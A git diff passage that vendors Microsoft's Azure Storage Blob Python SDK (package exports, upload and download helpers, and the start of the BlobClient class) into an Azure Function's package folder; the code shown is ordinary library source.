+from ._version import VERSION
+from ._blob_client import BlobClient
+from ._container_client import ContainerClient
+from ._blob_service_client import BlobServiceClient
+from ._lease import BlobLeaseClient
+from ._download import StorageStreamDownloader
+from ._quick_query_helper import BlobQueryReader
+from ._shared_access_signature import generate_account_sas, generate_container_sas, generate_blob_sas
+from ._shared.policies import ExponentialRetry, LinearRetry
+from ._shared.response_handlers import PartialBatchErrorException
+from ._shared.models import (
+    LocationMode,
+    ResourceTypes,
+    AccountSasPermissions,
+    StorageErrorCode,
+    UserDelegationKey
+)
+from ._generated.models import (
+    RehydratePriority,
+)
+from ._models import (
+    BlobType,
+    BlockState,
+    StandardBlobTier,
+    PremiumPageBlobTier,
+    BlobImmutabilityPolicyMode,
+    SequenceNumberAction,
+    PublicAccess,
+    BlobAnalyticsLogging,
+    Metrics,
+    RetentionPolicy,
+    StaticWebsite,
+    CorsRule,
+    ContainerProperties,
+    BlobProperties,
+    FilteredBlob,
+    LeaseProperties,
+    ContentSettings,
+    CopyProperties,
+    BlobBlock,
+    PageRange,
+    AccessPolicy,
+    ContainerSasPermissions,
+    BlobSasPermissions,
+    CustomerProvidedEncryptionKey,
+    ContainerEncryptionScope,
+    BlobQueryError,
+    DelimitedJsonDialect,
+    DelimitedTextDialect,
+    QuickQueryDialect,
+    ArrowDialect,
+    ArrowType,
+    ObjectReplicationPolicy,
+    ObjectReplicationRule,
+    ImmutabilityPolicy
+)
+from ._list_blobs_helper import BlobPrefix
+
+__version__ = VERSION
+
+
+def upload_blob_to_url(
+        blob_url,  # type: str
+        data,  # type: Union[Iterable[AnyStr], IO[AnyStr]]
+        credential=None,  # type: Any
+        **kwargs):
+    # type: (...) -> Dict[str, Any]
+    """Upload data to a given URL
+
+    The data will be uploaded as a block blob.
+
+    :param str blob_url:
+        The full URI to the blob. This can also include a SAS token.
+    :param data:
+        The data to upload. This can be bytes, text, an iterable or a file-like object.
+    :type data: bytes or str or Iterable
+    :param credential:
+        The credentials with which to authenticate. This is optional if the
+        blob URL already has a SAS token. The value can be a SAS token string,
+        an instance of an AzureSasCredential from azure.core.credentials, an account
+        shared access key, or an instance of a TokenCredentials class from azure.identity.
+        If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential
+        - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError.
+    :keyword bool overwrite:
+        Whether the blob to be uploaded should overwrite the current data.
+        If True, upload_blob_to_url will overwrite any existing data. If set to False, the
+        operation will fail with a ResourceExistsError.
+    :keyword int max_concurrency:
+        The number of parallel connections with which to upload.
+    :keyword int length:
+        Number of bytes to read from the stream. This is optional, but
+        should be supplied for optimal performance.
+    :keyword dict(str,str) metadata:
+        Name-value pairs associated with the blob as metadata.
+    :keyword bool validate_content:
+        If true, calculates an MD5 hash for each chunk of the blob. The storage
+        service checks the hash of the content that has arrived with the hash
+        that was sent. This is primarily valuable for detecting bitflips on
This is primarily valuable for detecting bitflips on + the wire if using http instead of https as https (the default) will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword str encoding: + Encoding to use if text is supplied as input. Defaults to UTF-8. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: dict(str, Any) + """ + with BlobClient.from_blob_url(blob_url, credential=credential) as client: + return client.upload_blob(data=data, blob_type=BlobType.BlockBlob, **kwargs) + + +def _download_to_stream(client, handle, **kwargs): + """Download data to specified open file-handle.""" + stream = client.download_blob(**kwargs) + stream.readinto(handle) + + +def download_blob_from_url( + blob_url, # type: str + output, # type: str + credential=None, # type: Any + **kwargs): + # type: (...) -> None + """Download the contents of a blob to a local file or stream. + + :param str blob_url: + The full URI to the blob. This can also include a SAS token. + :param output: + Where the data should be downloaded to. This could be either a file path to write to, + or an open IO handle to write to. + :type output: str or writable stream. + :param credential: + The credentials with which to authenticate. This is optional if the + blob URL already has a SAS token or the blob is public. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, + an account shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword bool overwrite: + Whether the local file should be overwritten if it already exists. The default value is + `False` - in which case a ValueError will be raised if the file already exists. If set to + `True`, an attempt will be made to write to the existing file. If a stream handle is passed + in, this value is ignored. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :keyword int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https as https (the default) will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. 
+ :rtype: None + """ + overwrite = kwargs.pop('overwrite', False) + with BlobClient.from_blob_url(blob_url, credential=credential) as client: + if hasattr(output, 'write'): + _download_to_stream(client, output, **kwargs) + else: + if not overwrite and os.path.isfile(output): + raise ValueError("The file '{}' already exists.".format(output)) + with open(output, 'wb') as file_handle: + _download_to_stream(client, file_handle, **kwargs) + + +__all__ = [ + 'upload_blob_to_url', + 'download_blob_from_url', + 'BlobServiceClient', + 'ContainerClient', + 'BlobClient', + 'BlobType', + 'BlobLeaseClient', + 'StorageErrorCode', + 'UserDelegationKey', + 'ExponentialRetry', + 'LinearRetry', + 'LocationMode', + 'BlockState', + 'StandardBlobTier', + 'PremiumPageBlobTier', + 'SequenceNumberAction', + 'BlobImmutabilityPolicyMode', + 'ImmutabilityPolicy', + 'PublicAccess', + 'BlobAnalyticsLogging', + 'Metrics', + 'RetentionPolicy', + 'StaticWebsite', + 'CorsRule', + 'ContainerProperties', + 'BlobProperties', + 'BlobPrefix', + 'FilteredBlob', + 'LeaseProperties', + 'ContentSettings', + 'CopyProperties', + 'BlobBlock', + 'PageRange', + 'AccessPolicy', + 'QuickQueryDialect', + 'ContainerSasPermissions', + 'BlobSasPermissions', + 'ResourceTypes', + 'AccountSasPermissions', + 'StorageStreamDownloader', + 'CustomerProvidedEncryptionKey', + 'RehydratePriority', + 'generate_account_sas', + 'generate_container_sas', + 'generate_blob_sas', + 'PartialBatchErrorException', + 'ContainerEncryptionScope', + 'BlobQueryError', + 'DelimitedJsonDialect', + 'DelimitedTextDialect', + 'ArrowDialect', + 'ArrowType', + 'BlobQueryReader', + 'ObjectReplicationPolicy', + 'ObjectReplicationRule' +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..90f683a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_client.cpython-39.pyc new file mode 100644 index 0000000..8803da6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_service_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_service_client.cpython-39.pyc new file mode 100644 index 0000000..28571cb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_service_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_container_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_container_client.cpython-39.pyc 
new file mode 100644 index 0000000..fc22413 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_container_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_deserialize.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_deserialize.cpython-39.pyc new file mode 100644 index 0000000..5f778b8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_deserialize.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_download.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_download.cpython-39.pyc new file mode 100644 index 0000000..1ad1957 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_download.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_lease.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_lease.cpython-39.pyc new file mode 100644 index 0000000..a8e85ed Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_lease.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_list_blobs_helper.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_list_blobs_helper.cpython-39.pyc new file mode 100644 index 0000000..c1526ae Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_list_blobs_helper.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_models.cpython-39.pyc new file mode 100644 index 0000000..2637fff Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_quick_query_helper.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_quick_query_helper.cpython-39.pyc new file mode 100644 index 0000000..0407853 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_quick_query_helper.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_serialize.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_serialize.cpython-39.pyc new file mode 100644 index 0000000..db5d041 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_serialize.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_shared_access_signature.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_shared_access_signature.cpython-39.pyc new file mode 100644 index 0000000..163235b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_shared_access_signature.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_upload_helpers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_upload_helpers.cpython-39.pyc new file mode 100644 index 0000000..8fbae34 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_upload_helpers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_version.cpython-39.pyc new file mode 100644 index 0000000..d4146c4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_client.py new file mode 100644 index 0000000..fa2c07e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_client.py @@ -0,0 +1,4128 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- +# pylint: disable=too-many-lines,no-self-use +from functools import partial +from io import BytesIO +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, IO, Iterable, AnyStr, Dict, List, Tuple, + TYPE_CHECKING, + TypeVar, Type) +import warnings + +try: + from urllib.parse import urlparse, quote, unquote +except ImportError: + from urlparse import urlparse # type: ignore + from urllib2 import quote, unquote # type: ignore +import six +from azure.core.paging import ItemPaged +from azure.core.pipeline import Pipeline +from azure.core.tracing.decorator import distributed_trace +from azure.core.exceptions import ResourceNotFoundError, HttpResponseError, ResourceExistsError + +from ._shared import encode_base64 +from ._shared.base_client import StorageAccountHostsMixin, parse_connection_str, parse_query, TransportWrapper +from ._shared.encryption import generate_blob_encryption_data +from ._shared.uploads import IterStreamer +from ._shared.request_handlers import ( + add_metadata_headers, get_length, read_length, + validate_and_format_range_headers) +from ._shared.response_handlers import return_response_headers, process_storage_error, return_headers_and_deserialized +from ._generated import AzureBlobStorage +from ._generated.models import ( # pylint: disable=unused-import + DeleteSnapshotsOptionType, + BlobHTTPHeaders, + BlockLookupList, + AppendPositionAccessConditions, + SequenceNumberAccessConditions, + QueryRequest, + CpkInfo) +from ._serialize import ( + get_modify_conditions, + get_source_conditions, + get_cpk_scope_info, + get_api_version, + serialize_blob_tags_header, + serialize_blob_tags, + serialize_query_format, get_access_conditions +) +from ._deserialize import get_page_ranges_result, deserialize_blob_properties, deserialize_blob_stream, parse_tags, \ + deserialize_pipeline_response_into_cls +from ._quick_query_helper import BlobQueryReader +from ._upload_helpers import ( + upload_block_blob, + upload_append_blob, + upload_page_blob, _any_conditions) +from ._models import BlobType, BlobBlock, BlobProperties, BlobQueryError, QuickQueryDialect, \ + DelimitedJsonDialect, DelimitedTextDialect, PageRangePaged, PageRange +from ._download import StorageStreamDownloader +from ._lease import BlobLeaseClient + +if TYPE_CHECKING: + from datetime import datetime + from ._generated.models import BlockList + from ._models import ( # pylint: disable=unused-import + ContentSettings, + ImmutabilityPolicy, + PremiumPageBlobTier, + StandardBlobTier, + SequenceNumberAction + ) + +_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION = ( + 'The require_encryption flag is set, but encryption is not supported' + ' for this method.') + +ClassType = TypeVar("ClassType") + + +class BlobClient(StorageAccountHostsMixin): # pylint: disable=too-many-public-methods + """A client to interact with a specific blob, although that blob may not yet exist. + + For more optional configuration, please click + `here `_. + + :param str account_url: + The URI to the storage account. In order to create a client given the full URI to the blob, + use the :func:`from_blob_url` classmethod. + :param container_name: The container name for the blob. + :type container_name: str + :param blob_name: The name of the blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob_name: str + :param str snapshot: + The optional blob snapshot on which to operate. 
This can be the snapshot ID string
+        or the response returned from :func:`create_snapshot`.
+    :param credential:
+        The credentials with which to authenticate. This is optional if the
+        account URL already has a SAS token. The value can be a SAS token string,
+        an instance of an AzureSasCredential from azure.core.credentials, an account
+        shared access key, or an instance of a TokenCredentials class from azure.identity.
+        If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential
+        - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError.
+    :keyword str api_version:
+        The Storage API version to use for requests. Default value is the most recent service version that is
+        compatible with the current SDK. Setting to an older version may result in reduced feature compatibility.
+
+        .. versionadded:: 12.2.0
+
+    :keyword str secondary_hostname:
+        The hostname of the secondary endpoint.
+    :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks.
+        Defaults to 4*1024*1024, or 4MB.
+    :keyword int max_single_put_size: If the blob size is less than or equal to max_single_put_size, then the blob
+        will be uploaded with only one HTTP PUT request. If the blob size is larger than max_single_put_size,
+        the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB.
+    :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory-efficient
+        algorithm when uploading a block blob. Defaults to 4*1024*1024+1.
+    :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False.
+    :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB.
+    :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call;
+        anything larger will be downloaded in chunks (potentially in parallel). Defaults to 32*1024*1024, or 32MB.
+    :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024,
+        or 4MB.
+
+    .. admonition:: Example:
+
+        .. literalinclude:: ../samples/blob_samples_authentication.py
+            :start-after: [START create_blob_client]
+            :end-before: [END create_blob_client]
+            :language: python
+            :dedent: 8
+            :caption: Creating the BlobClient from a URL to a public blob (no auth needed).
+
+        .. literalinclude:: ../samples/blob_samples_authentication.py
+            :start-after: [START create_blob_client_sas_url]
+            :end-before: [END create_blob_client_sas_url]
+            :language: python
+            :dedent: 8
+            :caption: Creating the BlobClient from a SAS URL to a blob.
+    """
+    def __init__(
+            self, account_url,  # type: str
+            container_name,  # type: str
+            blob_name,  # type: str
+            snapshot=None,  # type: Optional[Union[str, Dict[str, Any]]]
+            credential=None,  # type: Optional[Any]
+            **kwargs  # type: Any
+        ):
+        # type: (...)
-> None
+        try:
+            if not account_url.lower().startswith('http'):
+                account_url = "https://" + account_url
+        except AttributeError:
+            raise ValueError("Account URL must be a string.")
+        parsed_url = urlparse(account_url.rstrip('/'))
+
+        if not (container_name and blob_name):
+            raise ValueError("Please specify a container name and blob name.")
+        if not parsed_url.netloc:
+            raise ValueError("Invalid URL: {}".format(account_url))
+
+        path_snapshot, sas_token = parse_query(parsed_url.query)
+
+        self.container_name = container_name
+        self.blob_name = blob_name
+        try:
+            self.snapshot = snapshot.snapshot  # type: ignore
+        except AttributeError:
+            try:
+                self.snapshot = snapshot['snapshot']  # type: ignore
+            except TypeError:
+                self.snapshot = snapshot or path_snapshot
+
+        # This parameter is used for the hierarchy traversal. Give precedence to credential.
+        self._raw_credential = credential if credential else sas_token
+        self._query_str, credential = self._format_query_string(sas_token, credential, snapshot=self.snapshot)
+        super(BlobClient, self).__init__(parsed_url, service='blob', credential=credential, **kwargs)
+        self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline)
+        self._client._config.version = get_api_version(kwargs)  # pylint: disable=protected-access
+
+    def _format_url(self, hostname):
+        container_name = self.container_name
+        if isinstance(container_name, six.text_type):
+            container_name = container_name.encode('UTF-8')
+        return "{}://{}/{}/{}{}".format(
+            self.scheme,
+            hostname,
+            quote(container_name),
+            quote(self.blob_name, safe='~/'),
+            self._query_str)
+
+    def _encode_source_url(self, source_url):
+        parsed_source_url = urlparse(source_url)
+        source_scheme = parsed_source_url.scheme
+        source_hostname = parsed_source_url.netloc.rstrip('/')
+        source_path = unquote(parsed_source_url.path)
+        source_query = parsed_source_url.query
+        result = ["{}://{}{}".format(source_scheme, source_hostname, quote(source_path, safe='~/'))]
+        if source_query:
+            result.append(source_query)
+        return '?'.join(result)
+
+    @classmethod
+    def from_blob_url(cls, blob_url, credential=None, snapshot=None, **kwargs):
+        # type: (Type[ClassType], str, Optional[Any], Optional[Union[str, Dict[str, Any]]], Any) -> ClassType
+        """Create BlobClient from a blob URL. This doesn't support customized blob URLs with '/' in the blob name.
+
+        :param str blob_url:
+            The full endpoint URL to the Blob, including SAS token and snapshot if used. This could be
+            either the primary endpoint, or the secondary endpoint depending on the current `location_mode`.
+        :type blob_url: str
+        :param credential:
+            The credentials with which to authenticate. This is optional if the
+            account URL already has a SAS token, or the connection string already has shared
+            access key values. The value can be a SAS token string,
+            an instance of an AzureSasCredential from azure.core.credentials, an account shared access
+            key, or an instance of a TokenCredentials class from azure.identity.
+            If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential
+            - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError.
+        :param str snapshot:
+            The optional blob snapshot on which to operate. This can be the snapshot ID string
+            or the response returned from :func:`create_snapshot`. If specified, this will override
+            the snapshot in the URL.
+        :returns: A Blob client.
+        :rtype: ~azure.storage.blob.BlobClient
+        """
+        try:
+            if not blob_url.lower().startswith('http'):
+                blob_url = "https://" + blob_url
+        except AttributeError:
+            raise ValueError("Blob URL must be a string.")
+        parsed_url = urlparse(blob_url.rstrip('/'))
+
+        if not parsed_url.netloc:
+            raise ValueError("Invalid URL: {}".format(blob_url))
+
+        account_path = ""
+        if ".core." in parsed_url.netloc:
+            # A '.core.' domain indicates a non-customized URL; a blob name with directory info can also be parsed.
+            path_blob = parsed_url.path.lstrip('/').split('/', maxsplit=1)
+        elif "localhost" in parsed_url.netloc or "127.0.0.1" in parsed_url.netloc:
+            path_blob = parsed_url.path.lstrip('/').split('/', maxsplit=2)
+            account_path += '/' + path_blob[0]
+        else:
+            # For a customized URL, a blob name that has directory info cannot be parsed.
+            path_blob = parsed_url.path.lstrip('/').split('/')
+            if len(path_blob) > 2:
+                account_path = "/" + "/".join(path_blob[:-2])
+
+        account_url = "{}://{}{}?{}".format(
+            parsed_url.scheme,
+            parsed_url.netloc.rstrip('/'),
+            account_path,
+            parsed_url.query)
+
+        msg_invalid_url = "Invalid URL. Provide a blob_url with a valid blob and container name."
+        if len(path_blob) <= 1:
+            raise ValueError(msg_invalid_url)
+        container_name, blob_name = unquote(path_blob[-2]), unquote(path_blob[-1])
+        if not container_name or not blob_name:
+            raise ValueError(msg_invalid_url)
+
+        path_snapshot, _ = parse_query(parsed_url.query)
+        if snapshot:
+            try:
+                path_snapshot = snapshot.snapshot  # type: ignore
+            except AttributeError:
+                try:
+                    path_snapshot = snapshot['snapshot']  # type: ignore
+                except TypeError:
+                    path_snapshot = snapshot
+
+        return cls(
+            account_url, container_name=container_name, blob_name=blob_name,
+            snapshot=path_snapshot, credential=credential, **kwargs
+        )
+
+    @classmethod
+    def from_connection_string(
+            cls,  # type: Type[ClassType]
+            conn_str,  # type: str
+            container_name,  # type: str
+            blob_name,  # type: str
+            snapshot=None,  # type: Optional[str]
+            credential=None,  # type: Optional[Any]
+            **kwargs  # type: Any
+        ):  # type: (...) -> ClassType
+        """Create BlobClient from a connection string.
+
+        :param str conn_str:
+            A connection string to an Azure Storage account.
+        :param container_name: The container name for the blob.
+        :type container_name: str
+        :param blob_name: The name of the blob with which to interact.
+        :type blob_name: str
+        :param str snapshot:
+            The optional blob snapshot on which to operate. This can be the snapshot ID string
+            or the response returned from :func:`create_snapshot`.
+        :param credential:
+            The credentials with which to authenticate. This is optional if the
+            account URL already has a SAS token, or the connection string already has shared
+            access key values. The value can be a SAS token string,
+            an instance of an AzureSasCredential from azure.core.credentials, an account shared access
+            key, or an instance of a TokenCredentials class from azure.identity.
+            Credentials provided here will take precedence over those in the connection string.
+        :returns: A Blob client.
+        :rtype: ~azure.storage.blob.BlobClient
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_authentication.py
+                :start-after: [START auth_from_connection_string_blob]
+                :end-before: [END auth_from_connection_string_blob]
+                :language: python
+                :dedent: 8
+                :caption: Creating the BlobClient from a connection string.
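+
+            A minimal inline sketch of the same call. The connection string and
+            names below are placeholders, not working values:
+
+            .. code-block:: python
+
+                # Hypothetical connection string and names, for illustration only.
+                conn_str = "DefaultEndpointsProtocol=https;AccountName=<account>;AccountKey=<key>"
+                blob_client = BlobClient.from_connection_string(
+                    conn_str, container_name="mycontainer", blob_name="hello.txt")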
+ """ + account_url, secondary, credential = parse_connection_str(conn_str, credential, 'blob') + if 'secondary_hostname' not in kwargs: + kwargs['secondary_hostname'] = secondary + return cls( + account_url, container_name=container_name, blob_name=blob_name, + snapshot=snapshot, credential=credential, **kwargs + ) + + @distributed_trace + def get_account_information(self, **kwargs): + # type: (**Any) -> Dict[str, str] + """Gets information related to the storage account in which the blob resides. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + """ + try: + return self._client.blob.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _upload_blob_options( # pylint:disable=too-many-statements + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + blob_type=BlobType.BlockBlob, # type: Union[str, BlobType] + length=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption and not self.key_encryption_key: + raise ValueError("Encryption required but no key was provided.") + encryption_options = { + 'required': self.require_encryption, + 'key': self.key_encryption_key, + 'resolver': self.key_resolver_function, + } + if self.key_encryption_key is not None: + cek, iv, encryption_data = generate_blob_encryption_data(self.key_encryption_key) + encryption_options['cek'] = cek + encryption_options['vector'] = iv + encryption_options['data'] = encryption_data + + encoding = kwargs.pop('encoding', 'UTF-8') + if isinstance(data, six.text_type): + data = data.encode(encoding) # type: ignore + if length is None: + length = get_length(data) + if isinstance(data, bytes): + data = data[:length] + + if isinstance(data, bytes): + stream = BytesIO(data) + elif hasattr(data, 'read'): + stream = data + elif hasattr(data, '__iter__'): + stream = IterStreamer(data, encoding=encoding) + else: + raise TypeError("Unsupported data type: {}".format(type(data))) + + validate_content = kwargs.pop('validate_content', False) + content_settings = kwargs.pop('content_settings', None) + overwrite = kwargs.pop('overwrite', False) + max_concurrency = kwargs.pop('max_concurrency', 1) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + kwargs['cpk_info'] = cpk_info + + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + kwargs['lease_access_conditions'] = get_access_conditions(kwargs.pop('lease', None)) + kwargs['modified_access_conditions'] = get_modify_conditions(kwargs) + kwargs['cpk_scope_info'] = get_cpk_scope_info(kwargs) + if content_settings: + kwargs['blob_headers'] = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + 
kwargs['blob_tags_string'] = serialize_blob_tags_header(kwargs.pop('tags', None)) + kwargs['stream'] = stream + kwargs['length'] = length + kwargs['overwrite'] = overwrite + kwargs['headers'] = headers + kwargs['validate_content'] = validate_content + kwargs['blob_settings'] = self._config + kwargs['max_concurrency'] = max_concurrency + kwargs['encryption_options'] = encryption_options + + if blob_type == BlobType.BlockBlob: + kwargs['client'] = self._client.block_blob + kwargs['data'] = data + elif blob_type == BlobType.PageBlob: + kwargs['client'] = self._client.page_blob + elif blob_type == BlobType.AppendBlob: + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + kwargs['client'] = self._client.append_blob + else: + raise ValueError("Unsupported BlobType: {}".format(blob_type)) + return kwargs + + def _upload_blob_from_url_options(self, source_url, **kwargs): + # type: (...) -> Dict[str, Any] + tier = kwargs.pop('standard_blob_tier', None) + overwrite = kwargs.pop('overwrite', False) + content_settings = kwargs.pop('content_settings', None) + source_authorization = kwargs.pop('source_authorization', None) + if content_settings: + kwargs['blob_http_headers'] = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=None, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'copy_source_authorization': source_authorization, + 'content_length': 0, + 'copy_source_blob_properties': kwargs.pop('include_source_blob_properties', True), + 'source_content_md5': kwargs.pop('source_content_md5', None), + 'copy_source': source_url, + 'modified_access_conditions': get_modify_conditions(kwargs), + 'blob_tags_string': serialize_blob_tags_header(kwargs.pop('tags', None)), + 'cls': return_response_headers, + 'lease_access_conditions': get_access_conditions(kwargs.pop('destination_lease', None)), + 'tier': tier.value if tier else None, + 